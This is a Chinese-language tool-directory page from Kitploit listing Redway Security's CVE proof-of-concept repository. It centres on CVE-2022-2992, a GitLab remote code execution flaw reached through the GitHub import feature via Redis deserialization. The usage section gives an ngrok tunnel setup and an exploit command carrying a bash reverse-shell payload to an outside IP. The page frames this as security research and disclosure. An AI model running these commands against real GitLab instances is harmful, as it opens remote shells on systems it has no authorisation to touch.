Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVEs — A collection of proof-of-concept exploit scripts written by the team at Redway Security for various CVEs. | Kitploit
工具/GitHubGitHub/redwaysecurity/cves
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubredwaysecurity/cves

CVEs

A collection of proof-of-concept exploit scripts written by the team at Redway Security for various CVEs.

查看仓库
221年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-2992:通过 GitHub 导入实现远程命令执行

信息

描述: 该漏洞允许经过身份验证的用户通过“从 GitHub 导入”API 端点实现远程代码执行。
受影响版本: 从 11.10 到 15.1.6 之前的所有版本、15.2 至 15.2.4、15.3 至 15.3.2
修复版本: 15.3.2
研究人员: vakzz
分析文章链接: https://blog.redwaysecurity.com/2023/04/desenvolvendo-o-exploit-para-o-cve-2022.html
NIST CVE 链接: https://nvd.nist.gov/vuln/detail/CVE-2022-2992

概念验证漏洞利用

描述

经过身份验证的用户可以将仓库从 GitHub 导入到 GitLab。攻击者可以尝试从自己控制的服务器导入仓库,该服务器在嵌套的 default_branch 中返回 Redis 序列化协议对象,使 GitLab 将该对象缓存到 Redis 中,Redis 随后对其进行反序列化并触发执行载荷。

使用/利用方法

需要一个个人访问令牌

root@kitploit:~
$ bundle install # install dependencies
$ ngrok http 127.0.0.1:4567  # start ngrok tunnel
$ export NGROK_URL=https://68b9-83-173-213-121.eu.ngrok.io # use the url from ngrok
$ ruby exploit.rb http://target.gitlab.com w4dg6wVj7j7xlJgpGLEYdwFe 'bash -c "sh -i >& /dev/tcp/172.23.0.1/1337 0>&1"' # that is a example, use your own payload

示例

Remote Command Execution via Github import

下载工具